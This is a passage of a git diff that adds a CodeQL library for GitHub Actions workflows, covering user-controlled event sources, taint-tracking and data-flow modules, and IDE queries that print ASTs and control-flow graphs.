isExternalUserControlledWorkflowRun(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +private class EventSource extends RemoteFlowSource { + EventSource() { + exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) + ) + } + + override string getSourceType() { result = "User-controlled events" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 000000000000..528f9e54832c --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -0,0 +1,31 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr u | + u.getTarget() = "mad9000/actions-find-and-replace-string" and + pred.asExpr() = u.getArgument(["source", "replace"]) and + succ.asExpr() = u + ) + } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll new file mode 100644 index 000000000000..4abb455b0ddc --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -0,0 +1,11 @@ +/** + * Provides Actions-specific definitions for use in the data flow library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll + */ + +private import codeql.dataflow.DataFlow + +module ActionsDataFlow implements InputSig { + import DataFlowPrivate + import DataFlowPublic +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll new file mode 100644 index 000000000000..b4abb3e8aa5f --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -0,0 +1,312 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +/** + * Not used + */ +class ParameterNode extends Node { + ParameterNode() { none() } +} + +/** + * Not used + */ +class ReturnNode extends Node { + ReturnNode() { none() } + + ReturnKind getKind() { none() } +} + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +class CastNode extends Node { + CastNode() { none() } +} + +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { this.getAstNode() instanceof Expression } +} + +/** + * A call corresponds to a Uses steps where a 3rd party action gets called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof UsesExpr } + + /** Gets a textual representation of this element. */ + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } +} + +// class DataFlowCallable instanceof Cfg::CfgScope { +// DataFlowCallable() { none() } +// +// string toString() { result = super.toString() } +// +// string getName() { result = "none" } +// } +/** + * A Cfg scope that can be called + * There are no callables in Actions, at least not in the AST + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { + if this instanceof StepStmt + then result = this.(StepStmt).getName() + else result = this.(JobStmt).getName() + } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { none() } + +// /** +// * Holds if the set of viable implementations that can be called by `call` +// * might be improved by knowing the call context. +// */ +// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } +// /** +// * Gets a viable dispatch target of `call` in the context `ctx`. This is +// * restricted to those `call`s for which a context might make a difference. +// */ +// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. + */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). + */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +bindingset[t1, t2] +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +private newtype TContent = TNoContent() { none() } + +class Content extends TContent { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +predicate forceHighPrecision(Content c) { none() } + +newtype TContentSet = TNoContentSet() { none() } + +private newtype TContentApprox = TNoContentApprox() { none() } + +class ContentApprox extends TContentApprox { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +ContentApprox getContentApprox(Content c) { none() } + +/** + * Not used since we dont have Callables in the AST + * Made a string to match the ArgumentPosition type + */ +class ParameterPosition extends string { + ParameterPosition() { none() } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } +} + +/** + * Not really used since we dont have Callables in the AST but needed for the InputSig signature + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(UsesExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + +predicate test1(UsesExpr u, string f, JobStmt j) { + u.getLocation().getFile().getBaseName() = "inter1.yml" and + f = u.getId() and + j = u.getJob() +} + +predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + f = r.getStepId() and + j = r.getJob() +} + +predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getId() = r.getStepId() and + u.getJob() = r.getJob() and + // el SOAE has no mapping DF NODE + n.asExpr() = r +} + +predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression + exists(Expression astFrom, JobOutputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getOutputExpr() = astFrom + ) +} + +/** + * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. + * For Actions, we dont need SSA nodes since it should be already in SSA form + * Local flow steps are always between two nodes in the same Cfg scope (job definition). + */ +pragma[nomagic] +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) +} + +/** + * Holds if data can flow from `node1` to `node2` through a non-local step + * that does not follow a call edge. For example, a step through a global + * variable. + */ +predicate jumpStep(Node node1, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, + * `node1` references an object with a content `c.getAReadContent()` whose + * value ends up in `node2`. + */ +predicate readStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, + * `node2` references an object with a content `c.getAStoreContent()` that + * contains the value of `node1`. + */ +predicate storeStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if values stored inside content `c` are cleared at node `n`. For example, + * any value stored inside `f` is cleared at the pre-update node associated with `x` + * in `x.f = newValue`. + */ +predicate clearsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the value that is being tracked is expected to be stored inside content `c` + * at node `n`. + */ +predicate expectsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the node `n` is unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } + +/** + * Holds if flow is allowed to pass from parameter `p` and back to itself as a + * side-effect, resulting in a summary from `p` to itself. + * + * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed + * by default as a heuristic. + */ +predicate allowParameterReturnInSelf(ParameterNode p) { none() } + +predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +private newtype TLambdaCallKind = TNone() + +class LambdaCallKind = TLambdaCallKind; + +/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */ +predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() } + +/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */ +predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() } + +/** Extra data-flow steps needed for lambda flow analysis. */ +predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll new file mode 100644 index 000000000000..41be90718d85 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -0,0 +1,78 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import DataFlowPrivate + +class Node extends TNode { + /** Gets a textual representation of this element. */ + string toString() { none() } + + Location getLocation() { none() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } + + AstNode asExpr() { none() } +} + +/** + * Any Ast Expression + * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... + */ +class ExprNode extends Node, TExprNode { + private DataFlowExpr expr; + + ExprNode() { this = TExprNode(expr) } + + Cfg::Node getCfgNode() { result = expr } + + override string toString() { result = expr.toString() } + + override Location getLocation() { result = expr.getLocation() } + + override AstNode asExpr() { result = expr.getAstNode() } +} + +/** + * An argument to a Uses step (call) + */ +class ArgumentNode extends ExprNode { + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + + predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { + this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + call.(Cfg::Node).getAstNode() = + any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + } +} + +/** Gets the node corresponding to `e`. */ +Node exprNode(DataFlowExpr e) { result = TExprNode(e) } + +/** + * An entity that represents a set of `Content`s. + * + * The set may be interpreted differently depending on whether it is + * stored into (`getAStoreContent`) or read from (`getAReadContent`). + */ +class ContentSet extends TContentSet { + /** Gets a textual representation of this element. */ + string toString() { none() } + + /** Gets a content that may be stored into when storing into this set. */ + Content getAStoreContent() { none() } + + /** Gets a content that may be read from when reading from this set. */ + Content getAReadContent() { none() } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll new file mode 100644 index 000000000000..c2d51748f20f --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -0,0 +1,11 @@ +/** + * Provides Actions-specific definitions for use in the taint tracking library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll + */ + +private import codeql.dataflow.TaintTracking +private import DataFlowImplSpecific + +module ActionsTaintTracking implements InputSig { + import TaintTrackingPrivate +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll new file mode 100644 index 000000000000..a7e0d23df2b4 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -0,0 +1,30 @@ +/** + * Provides modules for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ + +private import DataFlowPrivate +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.Ast + +/** + * Holds if `node` should be a sanitizer in all global taint flow configurations + * but not in local taint. + */ +predicate defaultTaintSanitizer(DataFlow::Node node) { none() } + +/** + * Holds if the additional step from `nodeFrom` to `nodeTo` should be included + * in all global taint flow configurations. + */ +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +} + +/** + * Holds if taint flow configurations should allow implicit reads of `c` at sinks + * and inputs to additional taint steps. + */ +bindingset[node] +predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() } diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll new file mode 100644 index 000000000000..90ce11764b58 --- /dev/null +++ b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll @@ -0,0 +1,19 @@ +private import codeql.files.FileSystem + +/** + * Returns an appropriately encoded version of a filename `name` + * passed by the VS Code extension in order to coincide with the + * output of `.getFile()` on locatable entities. + */ +cached +File getFileBySourceArchiveName(string name) { + // The name provided for a file in the source archive by the VS Code extension + // has some differences from the absolute path in the database: + // 1. colons are replaced by underscores + // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" -> + // "/C_/foo/bar" + // 3. double slashes in UNC prefixes are replaced with a single slash + // We can handle 2 and 3 together by unconditionally adding a leading slash + // before replacing double slashes. + name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") +} \ No newline at end of file diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/ql/lib/codeql/actions/ideContextual/printAst.qll new file mode 100644 index 000000000000..f8a7c16f0712 --- /dev/null +++ b/ql/lib/codeql/actions/ideContextual/printAst.qll @@ -0,0 +1,137 @@ +/** + * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph. + * + * By default, this will print the AST for all nodes in the database. To change + * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode` + * to hold for only the AST nodes you wish to view. + */ + +private import codeql.actions.Ast +private import codeql.Locations + +/** + * The query can extend this class to control which nodes are printed. + */ +class PrintAstConfiguration extends string { + PrintAstConfiguration() { this = "PrintAstConfiguration" } + + /** + * Holds if the given node should be printed. + */ + predicate shouldPrintNode(PrintAstNode n) { any() } +} + +newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() } + +private predicate shouldPrintNode(PrintAstNode n) { + any(PrintAstConfiguration config).shouldPrintNode(n) +} + +/** + * A node in the output tree. + */ +class PrintAstNode extends TPrintNode { + /** Gets a textual representation of this node in the PrintAst output tree. */ + string toString() { none() } + + /** + * Gets the child node with name `edgeName`. Typically this is the name of the + * predicate used to access the child. + */ + PrintAstNode getChild(string edgeName) { none() } + + /** Get the Location of this AST node */ + Location getLocation() { none() } + + /** Gets a child of this node. */ + final PrintAstNode getAChild() { result = this.getChild(_) } + + /** Gets the parent of this node, if any. */ + final PrintAstNode getParent() { result.getAChild() = this } + + /** Gets a value used to order this node amongst its siblings. */ + int getOrder() { + this = + rank[result](PrintRegularAstNode p, Location l, File f | + l = p.getLocation() and + f = l.getFile() + | + p + order by + f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(), + l.getEndLine(), l.getEndColumn() + ) + } + + /** + * Gets the value of the property of this node, where the name of the property + * is `key`. + */ + final string getProperty(string key) { + key = "semmle.label" and + result = this.toString() + or + key = "semmle.order" and result = this.getOrder().toString() + } +} + +/** An `AstNode` in the output tree. */ +class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode { + AstNode astNode; + + PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) } + + override string toString() { + result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString() + } + + override Location getLocation() { result = astNode.getLocation() } + + override PrintAstNode getChild(string name) { + exists(int i | + name = i.toString() and + result = + TPrintRegularAstNode(rank[i](AstNode child, Location l | + child.getParentNode() = astNode and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), + child.toString() + )) + ) + } +} + +/** + * Holds if `node` belongs to the output tree, and its property `key` has the + * given `value`. + */ +query predicate nodes(PrintAstNode node, string key, string value) { + value = node.getProperty(key) and shouldPrintNode(node) +} + +/** + * Holds if `target` is a child of `source` in the AST, and property `key` of + * the edge has the given `value`. + */ +query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) { + shouldPrintNode(source) and + shouldPrintNode(target) and + target = source.getChild(_) and + ( + key = "semmle.label" and + value = strictconcat(string name | source.getChild(name) = target | name, "/") + or + key = "semmle.order" and + value = target.getProperty("semmle.order") + ) +} + +/** + * Holds if property `key` of the graph has the given `value`. + */ +query predicate graphProperties(string key, string value) { + key = "semmle.graphKind" and value = "tree" +} diff --git a/ql/lib/codeql/files/FileSystem.qll b/ql/lib/codeql/files/FileSystem.qll new file mode 100644 index 000000000000..552b85a4673f --- /dev/null +++ b/ql/lib/codeql/files/FileSystem.qll @@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml new file mode 100644 index 000000000000..df2fe6e37348 --- /dev/null +++ b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml @@ -0,0 +1,39 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +inProgress: + primaryLanguage: yaml + installedExtractors: + go: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go + python: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python + java: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java + html: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html + xml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml + properties: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties + cpp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp + swift: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift + csv: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv + yaml: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml + csharp: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp + javascript: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript + ruby: + - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby +creationMetadata: + cliVersion: 2.16.0 + creationTime: 2024-02-02T10:02:02.082819Z +finalised: false diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/ql/lib/ide-contextual-queries/printAst.ql new file mode 100644 index 000000000000..9effce3721f5 --- /dev/null +++ b/ql/lib/ide-contextual-queries/printAst.ql @@ -0,0 +1,29 @@ +/** + * @name Print AST + * @description Produces a representation of a file's Abstract Syntax Tree. + * This query is used by the VS Code extension. + * @id actions/print-ast + * @kind graph + * @tags ide-contextual-queries/print-ast + */ + +private import codeql.actions.ideContextual.IDEContextual +import codeql.actions.ideContextual.printAst +private import codeql.actions.Ast + +/** + * The source file to generate an AST from. + */ +external string selectedSourceFile(); + +/** + * A configuration that only prints nodes in the selected source file. + */ +class Cfg extends PrintAstConfiguration { + override predicate shouldPrintNode(PrintAstNode n) { + super.shouldPrintNode(n) and + n instanceof PrintRegularAstNode and + n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) + } +} + diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/ql/lib/ide-contextual-queries/printCfg.ql new file mode 100644 index 000000000000..d4a90f87f923 --- /dev/null +++ b/ql/lib/ide-contextual-queries/printCfg.ql @@ -0,0 +1,53 @@ +/** + * @name Print CFG + * @description Produces a representation of a file's Control Flow Graph. + * This query is used by the VS Code extension. + * @id actions/print-cfg + * @kind graph + * @tags ide-contextual-queries/print-cfg + */ + + private import codeql.actions.Cfg + private import codeql.actions.Cfg::TestOutput + private import codeql.actions.ideContextual.IDEContextual + private import codeql.Locations + + /** + * Gets the source file to generate a CFG from. + */ + external string selectedSourceFile(); + + external string selectedSourceLine(); + + external string selectedSourceColumn(); + + bindingset[file, line, column] + private CfgScope smallestEnclosingScope(File file, int line, int column) { + result = + min(Location loc, CfgScope scope | + loc = scope.getLocation() and + ( + loc.getStartLine() < line + or + loc.getStartLine() = line and loc.getStartColumn() <= column + ) and + ( + loc.getEndLine() > line + or + loc.getEndLine() = line and loc.getEndColumn() >= column + ) and + loc.getFile() = file + | + scope + order by + loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn() + ) + } + + class MyRelevantNode extends RelevantNode { + MyRelevantNode() { + this.getScope() = + smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()), + selectedSourceLine().toInt(), selectedSourceColumn().toInt()) + } + } diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo new file mode 100644 index 000000000000..c77f7924c126 --- /dev/null +++ b/ql/lib/qlpack.gbo @@ -0,0 +1,13 @@ +--- +warnOnImplicitThis: false +name: seclab/actions-all +version: 0.0.1-dev +groups: actions +extractor: actions +library: true +tests: test +dependencies: + codeql/javascript-all: ^0.8.7 + "codeql/controlflow": "*" + "codeql/dataflow": "*" + "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml new file mode 100644 index 000000000000..325c63f4625d --- /dev/null +++ b/ql/lib/qlpack.yml @@ -0,0 +1,15 @@ +--- +library: true +warnOnImplicitThis: true +name: codeql/actions-all +version: 0.0.1-dev +dependencies: + codeql/controlflow: ^0.1.7 + codeql/yaml: '*' + codeql/util: '*' + codeql/dataflow: ^0.1.7 +dbscheme: yaml.dbscheme +extractor: yaml +tests: test +groups: + - yaml diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json new file mode 100644 index 000000000000..9e26dfeeb6e6 --- /dev/null +++ b/ql/lib/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml new file 